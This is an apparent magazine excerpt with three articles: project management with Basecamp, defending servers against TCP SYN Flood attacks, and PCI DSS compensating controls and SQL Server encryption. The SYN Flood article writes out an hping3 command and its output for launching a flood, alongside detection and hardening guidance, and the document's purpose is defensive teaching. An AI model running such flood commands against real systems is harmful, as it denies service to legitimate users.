and cheat sheets at: https://basecamp.com/help.
I hope this article gives you the basics to help get projects done a little more efficiently and with more peace of
mind. Having a sense of control and being able to confidently get things done and report positively to the client
definitely makes your life easier. I like easy (Freudian slip).
There are of course more advanced tools but we have chosen Basecamp and related online applications
because they are flexible enough for the projects we are working with, while easy enough for clients to
respond to. All things are centralized and documented automatically in one place. And if the client responds,
then you have a direction you can move towards to make it closer to finishing the goals of the job.
If anyone is interested in the work we have done please take a gander at our site http://www.isointeractive.com
as we have at least some of our public projects posted there. Mostly we deal with helping clients and partners
fix or develop mobile apps, websites, software reviews/audits, games, 3D simulations, lots of specialty
projects and good old web development. Typically they range from 10k to under a million USD.
A few links of interest:
• ISO White Paper: www.isointeractive.com/pdf
• ISO Video: www.isointeractive.com/#showreel
• ISO Website: www.isointeractive.com
Thank you, and we look forward to continuing to contribute to the interactive community.
If you have any needs or even just want to brainstorm, please feel free to connect.
• email: [email protected]
• skype: troyhipolito
• web: isointeractive.com
• facebook: facebook.com/ISOinteractive
• twitter: @isointeractive
• instagram: iso_interactive
About the Author
Troy Hipolito is the Senior Consultant at ISO Interactive (a consulting social and mobile game company
that supports agencies for campaigns, Facebook games, iPhone Apps and that sort of thing).
Tackling SYN Flood attacks
by Ratan Jyoti
A TCP SYN flooding attack is a type of Denial of Service attack in which many bogus TCP SYN
packets are originated. In the normal three way handshake between client and server,
the client first initiates the connection with a TCP SYN packet, the intended server responds with
a SYN/ACK packet, and finally the client replies with an ACK packet to establish the connection.
Figure 1. A normal three way TCP Handshake
In a TCP SYN flood attack, the malicious client begins a three way handshake which it never
finishes. The client only sends TCP SYN packets and never the final ACK packets, so the
server reserves a memory slot for each incomplete connection. The server’s memory thus fills
with an increasing number of incomplete connections until, for want of free memory, it can no longer
accept other incoming requests (both genuine and malicious). The goal of this simple technique
is to deny TCP services to legitimate clients by creating a large number of half-open TCP connections
that fill the host’s listen queue. Usually, these TCP SYN packets use counterfeit source IP addresses to prevent
detection, and because these IP addresses are nonexistent, no responses are returned to the server.
Figure 2. TCP SYN Flood Attack
A sample SYN Flood induction in Linux by hping3
Hping3 is a tool developed by [email protected] which can send custom arbitrary TCP/IP packets to network
hosts. Hping3 is a multipurpose tool which can be used to perform the following, among other things:
• Testing firewall rules
• Port scanning (basic and advanced)
• Testing network performance
• Trace routing
• Remote OS fingerprinting
• TCP/IP stack auditing
This tool can be used to induce SYN Flooding. A sample SYN Flood attack input
and output are demonstrated below:
Input:
$ sudo hping3 -i u2 -S -p XX -c N IP_Address
Output:
HPING IP_Address (eth0 IP_Address): S set, 40 headers + 0 data bytes
--- IP_Address hping statistic ---
N packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
The above command would send TCP SYN packets to the IP_Address mentioned. Hping3 creates raw
packets, which requires root privileges, hence sudo is required. Here:
• -S – sets the SYN flag
• -p XX – denotes target port XX
• -i u2 – wait 2 microseconds between each packet
• -c N – the number of packets to send/receive, i.e. send N packets
hping3 works in multiple modes, which are:
• default mode: TCP
• -0 --rawip: RAW IP mode
• -1 --icmp: ICMP mode
• -2 --udp: UDP mode
• -8 --scan: SCAN mode
How to determine if a particular server is under a SYN Flood attack
Netstat in Linux is a simple tool with which it can be determined whether or not a server is under a SYN Flood
attack. Let us consider a server which can handle ten thousand user requests per second.
Table 1. SYN Flood Attack analysis
Input: netstat -nap | grep SYN | wc -l
Output               Possible SYN Flood attack status
<1000                SYN Flood attack less likely
>1000 and <5000      Possible SYN Flood attack
>5000                SYN Flood attack
Anything more than 2000 user requests per second is abnormal and denotes a possible SYN Flood situation.
A few hundred user requests per second depicts the normal situation.
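The netstat check in Table 1 can be scripted so that it matches the State column exactly (a plain `grep SYN` also matches process names or anything else containing the string) and, beyond the raw count, shows which sources dominate. The following is an added example and not code from the article; the netstat lines are constructed sample data in the `netstat -nap` layout, and the 1000/5000 bands are the article's own thresholds.

```python
"""Count half-open (SYN_RECV) connections in netstat output and rate the count
against the thresholds in Table 1.

Added example, not from the original article. The netstat lines are
constructed sample data in the `netstat -nap` layout; the 1000/5000
thresholds are the article's.
"""
from collections import Counter

# Constructed sample of `netstat -nap` output: one established connection,
# three half-open ones (two from the same source) and one in TIME_WAIT.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.0.0.5:80             192.0.2.10:51234        ESTABLISHED 1234/nginx
tcp        0      0 10.0.0.5:80             198.51.100.7:40001      SYN_RECV    -
tcp        0      0 10.0.0.5:80             198.51.100.7:40002      SYN_RECV    -
tcp        0      0 10.0.0.5:80             203.0.113.9:3333        SYN_RECV    -
tcp        0      0 10.0.0.5:443            192.0.2.11:51300        TIME_WAIT   -
"""


def parse_half_open(netstat_text):
    """Return (total SYN_RECV count, Counter of SYN_RECV entries per source IP).

    Same idea as `netstat -nap | grep SYN | wc -l`, but the State column is
    matched exactly, so a process name or address containing 'SYN' is not
    miscounted.
    """
    per_source = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        # tcp/tcp6 rows: Proto Recv-Q Send-Q Local Foreign State [PID/Program]
        if len(fields) < 6 or fields[0] not in ("tcp", "tcp6"):
            continue
        if fields[5] != "SYN_RECV":
            continue
        src_ip = fields[4].rsplit(":", 1)[0]  # strip the source port
        per_source[src_ip] += 1
    return sum(per_source.values()), per_source


def classify(half_open):
    """Apply Table 1's bands. The table leaves exactly 1000 and 5000 undefined;
    here 1000 is treated as 'possible' and 5000 as 'attack' (an assumption)."""
    if half_open < 1000:
        return "SYN Flood attack less likely"
    if half_open < 5000:
        return "Possible SYN Flood attack"
    return "SYN Flood attack"


def top_sources(per_source, n=3):
    """Most frequent sources. With spoofed SYNs these are scattered random
    addresses; a few dominant sources instead suggest non-spoofed clients that
    can be rate-limited or filtered individually."""
    return per_source.most_common(n)


if __name__ == "__main__":
    total, per_source = parse_half_open(SAMPLE_NETSTAT)
    print(f"{total} half-open connections: {classify(total)}")
    for ip, count in top_sources(per_source):
        print(f"  {ip}: {count}")
```

On a live system, feed the script the output of `netstat -nap` (or adapt the column positions for `ss -tan`, whose layout differs); the per-source breakdown is what tells you whether the flood is spoofed (no repeating sources) or comes from a handful of real hosts.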
Ways to prevent/defend SYN Flood attack
Filtering based on IP address
Ingress IP filtering at the peripheral devices, such as the router, will decrease the chances of IP spoofing
which can induce SYN Flood or similar attack. For example, the following ingress filter will be effective to
tackle a SYN Flood attack:
Listing 3. A simple logic for filtering IP addresses
IF request source IP is within X.X.X.0/N
THEN allow the request
IF request source IP is anything else
THEN deny the request
The IP ranges need to be configured carefully based on trust levels. The deployment of filter devices and their
position in the network is key. It may be difficult to stop the attack entirely: the drawback is a malicious attacker
who uses compromised legitimate IP addresses and changes these legitimate sources frequently. Such
sources may be difficult to tackle with this IP filtering.
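The IF/THEN logic of Listing 3 as working code, with the implicit final deny made explicit and a bogon check added first, in the spirit of the RFC 2827 / RFC 3704 ingress-filtering guidance the article cites. This is an added example, not code from the article; the trusted prefixes are constructed placeholders (documentation ranges) and the bogon list is the usual private, loopback and unspecified ranges.

```python
"""Ingress (anti-spoofing) filter decision in the spirit of Listing 3 and the
RFC 2827 / RFC 3704 guidance the article cites.

Added example, not from the article. The trusted prefixes are constructed
placeholders (documentation ranges); the bogon list is the usual private,
loopback and unspecified ranges.
"""
import ipaddress

# Constructed: prefixes whose addresses may legitimately appear as the source
# of packets entering on this interface (the article's "X.X.X.0/N").
TRUSTED_SOURCES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8::/32"),
]

# Ranges that must never arrive from the outside: their presence as a source
# address on an external interface is spoofing by definition.
BOGON_SOURCES = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("::1/128"),
]


def ingress_decision(src, trusted=TRUSTED_SOURCES, bogons=BOGON_SOURCES):
    """Return ("allow" | "deny", reason) for a packet's source address.

    Order matters: bogons are rejected first, then only explicitly trusted
    prefixes are allowed, and everything else is denied by default, which is
    the IF/THEN logic of Listing 3 with the implicit final deny made explicit.
    """
    try:
        addr = ipaddress.ip_address(src)
    except ValueError:
        return "deny", f"unparseable source address {src!r}"
    for net in bogons:
        if addr in net:      # False when the address families differ
            return "deny", f"{addr} is in bogon/internal range {net}"
    for net in trusted:
        if addr in net:
            return "allow", f"{addr} is within trusted prefix {net}"
    return "deny", f"{addr} matches no trusted prefix"


def filter_batch(sources):
    """Apply the decision to a list of source addresses; returns {src: decision}."""
    return {src: ingress_decision(src)[0] for src in sources}


if __name__ == "__main__":
    # Constructed sample sources: trusted, private (spoofed), unknown, malformed.
    for src in ("203.0.113.77", "10.1.2.3", "198.51.100.1", "2001:db8::1", "bad"):
        print(src, ingress_decision(src))
```

Malformed input is denied rather than raising, because a filter that crashes on a bad packet fails open. Note the limitation the article states: the filter cannot help against SYNs from compromised hosts that sit inside a trusted prefix.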
Increasing Transmission Control Block Backlog queue
Each connection is different and thus TCP uses a special data structure called a Transmission Control
Block (TCB) to maintain all the vital information about a connection. Each device maintains its own
TCB for the connection individually. As soon as a connection starts, the respective TCB holds all the special
information about it.
The memory each connection consumes depends on the TCB and its implementation. The TCP SYN-RECEIVED
state is a half-open condition, and the TCB is allocated upon receipt of the SYN packet. In a SYN Flood
scenario, the complete backlog of TCBs is used up by connections in the SYN-RECEIVED state, with SYN-ACKs sent to the
attacker’s fake endpoints, and thus there remains no room for new TCBs to be put into SYN-RECEIVED, because of which incoming SYNs cannot be handled.
Increasing the backlog can tackle a SYN Flood attack to some extent. However, increasing the backlog by too
much can have a performance cost as well.
Listing 1. Increasing Backlog – net/core/request_sock.c
……..
int sysctl_max_syn_backlog = 1024;
EXPORT_SYMBOL(sysctl_max_syn_backlog);

int reqsk_queue_alloc(struct request_sock_queue *queue,
                      unsigned int nr_table_entries)
{
        size_t lopt_size = sizeof(struct listen_sock);
        struct listen_sock *lopt;

        nr_table_entries = min_t(u32, nr_table_entries, sysctl_max_syn_backlog);
        nr_table_entries = max_t(u32, nr_table_entries, 8);
        nr_table_entries = roundup_pow_of_two(nr_table_entries + 1);
        lopt_size += nr_table_entries * sizeof(struct request_sock *);
        if (lopt_size > PAGE_SIZE)
                lopt = vzalloc(lopt_size);
        else
                lopt = kzalloc(lopt_size, GFP_KERNEL);
        if (lopt == NULL)
                return -ENOMEM;

        for (lopt->max_qlen_log = 3;
             (1 << lopt->max_qlen_log) < nr_table_entries;
             lopt->max_qlen_log++);
        ……..
Source: request_sock.c by Arnaldo Carvalho de Melo
One SYN_RECV socket costs approximately 80 bytes on a 32-bit system. The minimum value is 128,
intended for low-memory machines. Experiments with real servers show that this is very low, as such a server
would struggle to handle even 100 requests per second. A minimum of 1024 is recommended. However, the actual number
depends on the expected number of requests per second; a machine with more memory may handle more user
requests per second.
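To see what Listing 1 actually does to a backlog value, the three clamping steps and the max_qlen_log loop can be reproduced outside the kernel and combined with the 80-byte-per-entry figure quoted above. This is an added example, not kernel code and not from the article; the 8-byte pointer size is an assumption (64-bit build) and sizeof(struct listen_sock) is ignored.

```python
"""Reproduce the backlog sizing arithmetic of reqsk_queue_alloc() in Listing 1
and estimate the memory a fully occupied half-open queue costs.

Added example, not kernel code and not from the article. The 80 bytes per
SYN_RECV entry is the figure quoted in the text; the 8-byte pointer size is
an assumption (64-bit build).
"""


def roundup_pow_of_two(n):
    """Smallest power of two >= n, for n >= 1 (same contract as the kernel helper)."""
    return 1 << (n - 1).bit_length()


def backlog_table_size(requested_backlog, sysctl_max_syn_backlog=1024):
    """Mirror the three clamping steps applied to nr_table_entries:
    cap by the sysctl, floor at 8, then round (n + 1) up to a power of two."""
    n = min(requested_backlog, sysctl_max_syn_backlog)
    n = max(n, 8)
    return roundup_pow_of_two(n + 1)


def max_qlen_log(nr_table_entries):
    """The for loop at the end of Listing 1: log2 of the table size, never below 3."""
    log = 3
    while (1 << log) < nr_table_entries:
        log += 1
    return log


def half_open_memory_bytes(nr_table_entries, bytes_per_syn_recv=80, pointer_size=8):
    """Approximate memory when every slot of the table holds a SYN_RECV request:
    one table pointer plus one request structure per slot."""
    return nr_table_entries * (pointer_size + bytes_per_syn_recv)


if __name__ == "__main__":
    for backlog, limit in ((5, 1024), (1000, 1024), (4096, 1024), (4096, 8192)):
        size = backlog_table_size(backlog, limit)
        print(f"listen backlog {backlog:>5}, sysctl {limit:>5} -> "
              f"{size:>5} slots, max_qlen_log {max_qlen_log(size)}, "
              f"~{half_open_memory_bytes(size) // 1024} KiB when full")
```

Two things the arithmetic makes visible: a listen() backlog of 1000 under the default sysctl of 1024 yields a 1024-slot table, and raising tcp_max_syn_backlog alone changes nothing for an application whose own listen() backlog is smaller, because of the min_t() step. A full 1024-slot table is on the order of 90 KiB, so memory is rarely the reason not to raise the limit; the cost is the lookup work per slot.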
Decreasing SYN-RECEIVED state timeout
Decreasing the SYN-RECEIVED state timeout value will decrease the time a half-open connection occupies
the backlog queue, therefore the effect of a SYN Flood will be reduced. However, a timeout value that is too
small may abort even legitimate requests. In the case of a SYN Flood, the attacked server never recognizes
the bogus requests. However, at the gateway level, these requests can be discarded and the SYN Flood
situation tackled. In new generation firewalls the semi-transparent gateway mechanism helps to
tackle SYN Floods by artificially completing the 3 way handshake and then completing the real 3 way handshake in a
secure manner.
For example, the tcp_synack_retries setting in some Linux versions tells the kernel the number of times the
SYN,ACK can be retransmitted in response to a SYN, which helps in dealing with a SYN Flood.
Listing 2. An ipv4 sysctl.conf
…….
net.ipv4.tcp_fin_timeout = X
net.ipv4.tcp_max_orphans = X
net.ipv4.tcp_max_syn_backlog = X
net.ipv4.tcp_rmem = 4096 87380 X
net.ipv4.tcp_sack = X
net.ipv4.tcp_syn_retries = X
net.ipv4.tcp_synack_retries = X
net.ipv4.tcp_syncookies = X
net.ipv4.tcp_timestamps = X
net.ipv4.tcp_tw_recycle = X
net.ipv4.tcp_wmem = X
A careful setting of tcp_synack_retries may give the desired results in handling SYN Flood.
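How long a half-open entry survives for a given tcp_synack_retries follows from the retransmit schedule, and the three settings discussed so far (tcp_syncookies, tcp_max_syn_backlog, tcp_synack_retries) can be audited from a sysctl.conf fragment. The following is an added example, not from the article: the two configuration fragments are constructed, the lifetime estimate assumes Linux's 1-second initial SYN-ACK retransmit timer doubling on each retry, and the thresholds in audit() are this example's choices (the 1024 backlog minimum is the one the text recommends).

```python
"""Check a sysctl.conf fragment for the SYN Flood settings discussed in the
text and estimate half-open lifetime from tcp_synack_retries.

Added example, not from the article. Both fragments are constructed. The
lifetime estimate assumes a 1-second initial SYN-ACK retransmit timer that
doubles on every retry (Linux's TCP_TIMEOUT_INIT); the audit thresholds are
this example's own choices.
"""

WEAK_CONF = """\
# constructed example: values a stock configuration might carry
net.ipv4.tcp_syncookies = 0
net.ipv4.tcp_max_syn_backlog = 128
net.ipv4.tcp_synack_retries = 5
"""

HARDENED_CONF = """\
# constructed example: the settings the article discusses, tightened
net.ipv4.tcp_syncookies = 1
net.ipv4.tcp_max_syn_backlog = 2048
net.ipv4.tcp_synack_retries = 2
"""


def parse_sysctl(text):
    """Parse `key = value` lines, ignoring blanks and # comments."""
    conf = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        conf[key] = value
    return conf


def synack_lifetime_seconds(retries, initial_rto=1.0):
    """Seconds a half-open entry stays in the backlog: the initial SYN-ACK plus
    `retries` retransmits, each waiting twice as long as the previous one."""
    return sum(initial_rto * (2 ** i) for i in range(retries + 1))


def audit(conf):
    """Return a list of findings; empty when all three settings look sane."""
    findings = []
    if conf.get("net.ipv4.tcp_syncookies") != "1":
        findings.append("tcp_syncookies is not enabled")
    backlog = int(conf.get("net.ipv4.tcp_max_syn_backlog", "0"))
    if backlog < 1024:
        findings.append(f"tcp_max_syn_backlog={backlog} is below the recommended 1024")
    retries = int(conf.get("net.ipv4.tcp_synack_retries", "5"))  # 5 is the kernel default
    lifetime = synack_lifetime_seconds(retries)
    if lifetime > 30:
        findings.append(f"tcp_synack_retries={retries} keeps half-open entries ~{lifetime:.0f}s")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(parse_sysctl(text)) or ["ok"])
```

With the default of 5 retries a bogus entry blocks its slot for about 63 seconds; with 2 retries, about 7 seconds, which is the trade-off the text describes between freeing the backlog quickly and aborting legitimate clients on slow or lossy paths.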
SYN Cache implementation – replacing the per-socket linear chain of unfinished queued requests with a global
hash table.
The SYN Cache implementation typically helps by limiting the number of entries in the following manner:
• By putting an upper limit on the memory that the SYN cache uses
• By putting an upper limit on the work a device requires for searching for a matching entry and replacing cache
entries
SYN Cache settings can be checked in the following manner and edited for optimum performance.
Table 2. SYN Cache setting in /boot/loader.conf
Input: sysctl -a | grep syncache
Output:
net.inet.tcp.syncache.rexmtlimit: X
net.inet.tcp.syncache.hashsize: X
net.inet.tcp.syncache.count: X
net.inet.tcp.syncache.cachelimit: X
net.inet.tcp.syncache.bucketlimit: X
This implementation is special due to its use of secret bits, which prevents an attacker from targeting particular hash
values in order to breach the bucket limit; the limits bound both CPU time and memory. The bucket limit is set for
each hash value; upon reaching the limit, the oldest entry is released.
SYN Cookies
SYN Cookies are a stateless SYN proxy mechanism, so called because they assign no state to connections
in SYN-RECEIVED. Instead, the state is encoded in the sequence number sent in the SYN-ACK. Thus only a
legitimate client can complete the handshake, while bogus requests fail because no TCB state is kept for
them. If the client sends a subsequent ACK response, the server can reconstruct the SYN queue entry using the details
encoded in the TCP sequence number. tcp_syncookies can be enabled in the following manner:
Table 3. SYN Cookies setting in /etc/sysctl.conf
Step   Activity                          Command / line to add
1      Edit the file /etc/sysctl.conf    vi /etc/sysctl.conf
2      Append the following              net.ipv4.tcp_syncookies = 1
3      Save the changes                  sysctl -p
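The SYN Cookies paragraph above says the state lives in the SYN-ACK sequence number; the following shows concretely how a server can mint such a number with no per-connection state and later validate the client's ACK against it. This is an added, deliberately simplified illustration, not code from the article and not the Linux implementation (which uses a different hash, field layout and MSS table); the 5/3/24-bit layout, the MSS table and the 64-second time unit are assumptions chosen for the example.

```python
"""A simplified SYN cookie: the server stores no per-connection state and
instead encodes what it needs into the SYN-ACK initial sequence number, then
validates the client's final ACK against it.

Added example, not from the article and not the Linux implementation (which
uses a different hash, layout and MSS table). Assumed 32-bit layout:
  bits 31-27: time counter in 64-second units, so stale cookies expire
  bits 26-24: index into a small MSS table, recovering the client's MSS
  bits 23-0 : truncated HMAC over the 4-tuple, counter and MSS index
"""
import hashlib
import hmac
import os

MSS_TABLE = (536, 1220, 1440, 1460)   # assumed table; 3 bits leave room for 8 entries
SECRET = os.urandom(32)               # a real stack rotates this key periodically


def _mac24(secret, saddr, daddr, sport, dport, counter, mss_idx):
    """24-bit keyed hash binding the cookie to this flow and time window."""
    msg = f"{saddr}|{daddr}|{sport}|{dport}|{counter}|{mss_idx}".encode()
    return int.from_bytes(hmac.new(secret, msg, hashlib.sha256).digest()[:3], "big")


def make_cookie(secret, saddr, daddr, sport, dport, client_mss, now):
    """Initial sequence number to put in the SYN-ACK; nothing is stored."""
    counter = (now // 64) & 0x1F
    fits = [i for i, mss in enumerate(MSS_TABLE) if mss <= client_mss]
    mss_idx = fits[-1] if fits else 0            # largest table MSS not above the client's
    mac = _mac24(secret, saddr, daddr, sport, dport, counter, mss_idx)
    return (counter << 27) | (mss_idx << 24) | mac


def check_cookie(secret, ack_num, saddr, daddr, sport, dport, now, max_age=1):
    """Return the negotiated MSS if the ACK carries a valid, fresh cookie for this
    4-tuple, otherwise None (the ACK is dropped and no connection is created)."""
    isn = (ack_num - 1) & 0xFFFFFFFF             # the ACK acknowledges ISN + 1
    counter = isn >> 27
    mss_idx = (isn >> 24) & 0x7
    mac = isn & 0xFFFFFF
    if mss_idx >= len(MSS_TABLE):
        return None
    age = (((now // 64) & 0x1F) - counter) & 0x1F   # modular: survives counter wrap
    if age > max_age:
        return None
    expected = _mac24(secret, saddr, daddr, sport, dport, counter, mss_idx)
    if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
        return None
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    flow = ("198.51.100.7", "10.0.0.5", 40001, 80)   # constructed client -> server 4-tuple
    isn = make_cookie(SECRET, *flow, 1460, now=1000)
    print("SYN-ACK ISN:", hex(isn))
    print("valid ACK  :", check_cookie(SECRET, isn + 1, *flow, now=1010))
    print("stale ACK  :", check_cookie(SECRET, isn + 1, *flow, now=1300))
```

Because nothing is stored between the SYN and the ACK, a flood of spoofed SYNs costs the server only the hash computation per packet; the price, as with the real mechanism, is that options which do not fit in the cookie (here everything except a coarse MSS) are lost for cookie-validated connections.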
Other approaches
There can be other approaches as well to contain SYN Floods. These can be:
• New Generation Firewall & Proxy Servers
• Recycling of the oldest Half Open TCBs
• Dynamic & adaptive threshold tuning and profiling
• Exception Recording, etc.
References
• http://www.ietf.org/rfc/rfc4987.txt
• http://linux.die.net/man/8/hping3
• http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-4/syn_flooding_attacks.html
• https://www.ietf.org/rfc/rfc2827.txt
• http://www.ietf.org/rfc/rfc3704.txt
• request_sock.c by Arnaldo Carvalho de Melo
About the Author
Ratan Jyoti is currently working as a Chief Manager (Information Security) at a leading
Indian Bank. He has more than 12 years’ experience in IT and Information Security in the
Banking Industry. He is a Certified Information Systems Security Professional, Certified
Information Systems Auditor and a Certified Ethical Hacker. His major areas of expertise
include Information Security Governance, Information Risk Management, IS Audit, Cyber
Forensics, Information Security Management System and Compliance. He is a regular
contributor to reputed International Journals and Magazines in the area of Information
Security.
IMPLEMENTATION OF TRANSPARENT
DATA ENCRYPTION (TDE)
AND ADDITIONAL COMPENSATIONAL CONTROLS AS ALTERNATIVE
METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT
SQL DATABASE (PCI DSS V3.0, SECTION 3.4)
by Darko Mihajlovski, Kiril Buhov, Jani Nikolov
“Proper” TDE implementation should cover the 3.4 requirement from PCI DSS v3, where it
demands the following: Render PAN unreadable anywhere it is stored (including on portable
digital media, backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures
It has come to Visa’s attention that certain assessors and merchants require clarification about the intent
of 3.4 PCI DSS requirements. PCI Requirement 3.4 states: Render sensitive cardholder data unreadable
anywhere it is stored (including data on portable media, in logs and data received from or stored by wireless
networks) by using any of the following approaches:
• One-way hashes (hashed indexes) such as SHA-1
• Truncation
• Index tokens and PADs, with the PADs being securely stored
• Strong cryptography, such as Triple-DES 128-bit or AES 256-bit with associated key management
processes and procedures.
The MINIMUM account information that needs to be rendered unreadable is the payment card account
number.
The use of encryption to render cardholder data unreadable is a highly effective and readily accepted way
to secure data. For companies that are unable to employ sufficient encryption solutions due to technical
constraints, compensating controls may be considered. Only companies that have undertaken a risk analysis
and have legitimate technological or business constraints will be considered for use of compensating
controls to achieve compliance. Compensating controls must provide additional protection to mitigate any
additional risk posed by the unencrypted data. Compensating controls considered must be in addition to
controls required in the PCI DSS. It is not a compensating control to simply be in compliance with other PCI
requirements. Encryption, while a desirable approach, is not the only approach to meeting PCI 3.4.
The problem occurs when the System/Application/Software Vendor tells you that encrypting the PANs is not
a possible option.
PCI AND THE ART OF THE COMPENSATING
CONTROL
Compensating controls are a standard part of any security posture. But what makes an effective
compensating control?
In the early years of the Payment Card Industry Data Security Standard (PCI DSS), and even one author’s
experience under the CISP program, the term compensating control was used to describe everything from
a legitimate work-around for a security challenge to a shortcut to compliance. If you are considering a
compensating control, you must perform a risk analysis and have a legitimate technological or documented
business constraint before you even go to the next step. Companies being assessed will present more
documented business constraints for review based on the current economic situation.
Every compensating control must meet four criteria before it can be considered for validity. The four items
that every compensating control must do are: meet the intent and rigor of the original PCI DSS requirement,
provide a similar level of defense as the original PCI DSS requirement, be “above and beyond” other PCI
DSS requirements, and be commensurate with the additional risk imposed by not adhering to the PCI DSS
requirement.
An example of a valid control might be using extra logs for the su command in UNIX to track actions
executed under a shared root password. In rare cases, a system may not be able to use something like sudo
to prevent shared administrator passwords from being used. Keep in mind, this is not a license to use
shared passwords everywhere in your environment. Nearly every system has the ability to use something
like sudo, or “Run As” which is free or built into your OS, or a commercial variant if your platform
requires this.
WHERE ARE COMPENSATING CONTROLS IN PCI DSS?
Compensating controls are not specifically defined inside PCI DSS, but are instead defined by you (as a
self-certifying merchant) or your QSA. That’s where the trouble starts.
Thankfully, the PCI Council provides an example of a completed compensating control in Appendix C of the
PCI DSS, as well as a blank template to fill out. Appendix B provides all the guidance they feel necessary in
order to design a compensating control.
Compensating controls are ultimately accepted by acquirers or the card brands themselves (if applicable),
so even after putting all of this information together you could face the rejection of your control and a
significant amount of expense re-architecting your process to fit the original control. This is where an
experienced QSA can really help you ensure your control passes the “Sniff Test.” If it smells like a valid
control, it probably will pass. If you need examples, look later in this chapter under the section titled “Funny
Controls You Didn’t Design.”
WHAT A COMPENSATING CONTROL IS NOT
Compensating controls are not a shortcut to compliance. In reality, most compensating controls are actually
harder to do and cost more money in the long run than fixing or addressing the original issue or
vulnerability.
Imagine walking into a meeting with a customer that has an open, flat network, with no encryption
anywhere to be found (including on their wireless network, which is not segmented either). Keep in mind,
network segmentation is not required by PCI, but it does make compliance easier. Usually in this situation,
assessors may find a legacy system that cannot be patched or upgraded, but now becomes in scope. Then the
conversation about compensating controls starts. Now imagine someone from the internal assessment team
telling you not to worry because they would just get some compensating controls. Finally, imagine they tell
you this in the same voice and tone as if they were going down to the local drug store to pick up a case of
compensating controls on aisle five.
Compensating controls were never meant to be a permanent solution for a compliance gap. Encryption
requirements on large systems were widely regarded as unreasonable early in this decade. Not only was there
limited availability of commercial off-the-shelf software, but it was prohibitively expensive to implement.
For Requirement 3.4 (Render PAN, at minimum, unreadable anywhere it is stored), card brands (largely
Visa at the time) were quick to point out that compensating controls could be implemented for this
requirement; one of those being strong access controls on large systems.
For mainframes, assessors would typically do a cursory walk through the controls and continue to
recommend an encryption solution at some point for those systems. At one point, compensating controls
were deemed to have a lifespan, meaning that the lack of encryption on a mainframe would only be
accepted for a certain period of time. After that, companies would need to put encryption strategies in place.
Compensating control life spans never materialized. Compensating controls can be used for nearly
every single requirement in the DSS; the most notable exception is the prohibition on storing sensitive
authentication data after authorization. There are many requirements that commonly show up on
compensating control worksheets, Requirement 3.4 being one of them.
To clarify: it is up to the QSA performing the assessment to decide whether to accept the control initially,
but the Acquiring Bank (for merchants) has the final say. Substantial documentation and an open channel of
communication to your acquirer are essential to ensure money is not wasted putting together controls that
ultimately do not pass muster.
Still, compensating controls are a viable path to compliance even considering the above caveats and
descriptions of why you may not want to use them.
HOW TO CREATE A GOOD COMPENSATING CONTROL
We’ve spent quite a bit of time setting this section up. We talked about what compensating controls
are, what they are not, and some of the best misguided attempts to create them. Before we discuss the
examples, please remember that these examples should be used for illustrative purposes only. I have
oversimplified the scenarios for brevity, and things are rarely this simple in the corporate world. Ultimately,
compensating controls must be approved first by a QSA or, barring that, your Acquiring Bank. I know I
don’t like it when someone brings an article about PCI to an interview during an assessment, so please
don’t do that with this one. Now let’s walk through a couple of examples of how one might create a good
compensating control.
Here’s a common compensating control that QSAs will define and implement at a customer. A Level 1
brick-and-mortar retailer with 2,500 stores has some systems in their stores that do not process cardholder
data. These systems are a high risk to this customer’s cardholder environment because they may access both
the internet through a local firewall and the corporate intranet and webmail system, and users log in to that
machine with the default administrator account. Store managers and retail operations claim that the systems
are required for day-to-day business because each store is empowered to customize its operations to better
fit the local market. The corporation believes this drives innovation and helps them maintain a competitive
edge over their peers.
If the retailer chooses not to segment the network, all of the systems in the store are now in scope, and they
must meet all of the applicable requirements of the PCI DSS. Doing this will add significant expense to the
IT infrastructure, and will probably force a call center to be staffed up in order to manage the volume of calls
that will come in for things like password maintenance.
What do you do? Do you crush the retailer’s aspirations to innovate by telling them they must deploy
Active Directory to these machines, lock them down Department of Defense tight, and staff a call center?
That is one option. But if you made that recommendation you missed something important: understanding
the business and limiting the impact that your compliance recommendations make. Instead, consider this
compensating control.
Any number of network components could be used to create some segmentation in this environment.
Let’s say that we have a VLAN (Virtual Local Area Network) aware switch at the location that can have
access lists (ACLs) tied to it. Why not create a new VLAN for just the POS network? Then create some
ACLs around it to make it look like it is segmented behind a firewall. Now the threat of the in-store PC is
effectively mitigated, provided that the ACLs are appropriately secure.
“But my store networks are different in every store,” you say. “I can’t just slap something in there like that
and expect it to work globally!” If this is the case, is your store support group overloaded with break-fix
calls? Maybe this could be an opportunity to shore this up and base each store’s network on a consistent
footprint?
APPROACH TO THE PROBLEM
SQL Server has advanced over the years to become a very popular, capable database, evolving from a
primarily departmental and SMB database to a fully enterprise-capable platform. SQL Server’s appeals are
many, from its highly scalable and secure database engine to its built-in reporting and data analysis tools.
SQL Server 2008 offers new features of particular interest to PCI DSS compliance, including:
• Full Database Encryption through Transparent Data Encryption (TDE)
• Split Key Ownership through Extensible Key Management (EKM)
• Granular Auditing Capabilities through SQL Server Audit and Change Data Capture
• Continued support of Signed Modules
• Built-in Control over Default SQL Server 2008 Features
• Stronger Control and Auditability over Server and Database Configuration through Policy-Based
Management
Implementation of the PCI DSS controls through SQL Server 2008 technology allows for the ability to
standardize and computerize security controls effectively and efficiently, particularly when applied during
the installation process.
